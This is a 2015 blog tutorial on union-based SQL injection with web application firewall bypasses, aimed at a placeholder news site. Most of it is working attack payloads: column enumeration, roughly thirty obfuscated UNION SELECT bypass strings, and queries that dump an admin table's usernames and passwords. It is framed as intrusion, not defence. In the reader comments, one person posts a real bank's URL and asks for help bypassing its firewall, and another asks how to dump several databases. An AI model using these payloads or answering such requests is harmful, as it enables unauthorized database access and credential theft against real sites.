Social Icons

Wednesday, 20 May 2015

Union Based SQL Injection (WAF Bypassing)

 
After Our Tutorial on Basics Of SQL Injection. 
                                       SQL Injection- Basics Of SQLi Part-1
                                       SQL Injection- Basics Of SQLi Part-2

 Union based SQL injection + WAF Bypassing By RAi Jee

Today i m Going To Discuss About Union based SQL injection And WAF Bypassing Techniques.
Lets Start Injecting.

Here Is Our Target .

 http://www.targetsite.com/news.php?id=11
Add Single Quote (') at the End Of The URL .

 http://www.targetsite.com/news.php?id=11'


Union Based SQL Injection (WAF Bypassing)
And Get MYSQL Error.
Lets Balance Our Query  for Further Injecting.
Some Comments from our Previous Tutorials.

 http://www.targetsite.com/news.php?id=11--

 http://www.targetsite.com/news.php?id=11--+

 http://www.targetsite.com/news.php?id=11-- - 

 http://www.targetsite.com/news.php?id=11%23

 http://www.targetsite.com/news.php?id=11;

 Here Is A Small Explanation on Balance and Comment in our Injection.
Union Based SQL Injection (WAF Bypassing)
After Balancing Our Query . Next is Count Total Number Of Columns
http://www.targetsite.com/news.php?id=11 order by 1--+
No Error !
http://www.targetsite.com/news.php?id=11 order by 3--+
No Error!

 http://www.targetsite.com/news.php?id=11 order by 5--+
Again No Error !

 http://www.targetsite.com/news.php?id=11 order by 6--+
Here We Get Error !
Unknown column '6' in 'order clause'

 Now Try To Find Our Vulnerable Columns.

 http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

 If Our Target site Is Protected with WAF . WAF Will Block Our Query and Give Us Mod_Security Error.

 So Here some WAF Bypassing Methods.
  •     /*!%55NiOn*/ /*!%53eLEct*/
  •     %55nion(%53elect 1,2,3)-- -
  •     +union+distinct+select+
  •     +union+distinctROW+select+
  •     /**//*!12345UNION SELECT*//**/
  •     /**//*!50000UNION SELECT*//**/
  •     /**/UNION/**//*!50000SELECT*//**/
  •     /*!50000UniON SeLeCt*/
  •     union /*!50000%53elect*/
  •     +#uNiOn+#sEleCt
  •     +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  •     /*!%55NiOn*/ /*!%53eLEct*/
  •     /*!u%6eion*/ /*!se%6cect*/
  •     +un/**/ion+se/**/lect
  •     uni%0bon+se%0blect
  •     %2f**%2funion%2f**%2fselect
  •     union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  •     REVERSE(noinu)+REVERSE(tceles)
  •     /*--*/union/*--*/select/*--*/
  •     union (/*!/**/ SeleCT */ 1,2,3)
  •     /*!union*/+/*!select*/
  •     union+/*!select*/
  •     /**/union/**/select/**/
  •     /**/uNIon/**/sEleCt/**/
  •     /**//*!union*//**//*!select*//**/
  •     /*!uNIOn*/ /*!SelECt*/
  •     +union+distinct+select+
  •     +union+distinctROW+select+
 Just Change The Union Select With Following Bypass URLs.

 Lets Continue Our Tutorial.
Now Check The Vulnerable Columns.we Use ( - ) for Finding Vulnerable columns.

 We Can Also Check Vulnerable Columns with Other methods instead of Just Using (-).

 Here Are Some Vulnerable Columns Checking Methods With Examples.
Using And 0
http://www.targetsite.com/news.php?id=11 and 0 Union Select 1,2,3,4,5--+

 Using And False
http://www.targetsite.com/news.php?id=11 and false Union Select 1,2,3,4,5--+

Using Div 0
http://www.targetsite.com/news.php?id=11 Div 0 Union Select 1,2,3,4,5--+ 

 Using null
http://www.targetsite.com/news.php?id=null Union Select 1,2,3,4,5--+ 

 Using .1337
http://www.targetsite.com/news.php?id=11.1337 Union Select 1,2,3,4,5--+ 
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

 We Will Get Our Vulnerable Columns Printed On The Page.3 is Our Vulnerable Column.
Union Based SQL Injection (WAF Bypassing)

 Here Are Some Variables Of  MYSQL.

 @@version                           =  Current Version
@@GLOBAL.VERSION    = Current Version
User()                                   = Current User
Database                              = Current Database

 http://www.targetsite.com/news.php?id=-11 Union Select 1,2,@@version,4,5--+

 We Can See Current Version Printed on the Page.
 Next Step Is To Get  The Tables.
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--+

 We can See Total Tables in Our Primary Database.
Now if you Want To Get Admin Details Of The Target Site check the Table name of Admin.
then encode admin table name in MYSQL Char() to get The Columns in the Admin Table.Change table_name to column_name,information_schema.tables to information_schema.columns and Table_schema to Table_name.And Replace Database() with our MYSQL Char() admin value.

 http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--+

 we can  see the Column Names on Page . like id,username,pass
to Get The Data From columns here is our final Query.
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(username,0x3a,password),4,5 from admin--+

 Author: Rai Muzammal Hussain a.k.a RAi Jee
Posted by at 09:28
Labels: ,

7 comments:

  1. z3p3r9 September 2015 at 06:14

    Nice , nice :)

    ReplyDelete
  2. Emman27 April 2016 at 08:06

    Hi will you please make a tutorial how to dump the multiple databse of a website??

    ReplyDelete
  3. Unknown4 April 2017 at 12:13

    Nice briefly explained

    ReplyDelete
  4. Unknown12 August 2017 at 23:39

    http://www.missionbanknepal.com.np/single_view.php?id=100 hey how to by pass this kind of
    WAF security can u help me please?

    ReplyDelete
  5. Unknown15 November 2017 at 01:16

    This comment has been removed by the author.

    ReplyDelete
  6. Unknown25 June 2019 at 07:36

    union all select command is not working .Can you help me with that .I didn't get any output after that

    ReplyDelete

Subscribe to: Post Comments (Atom)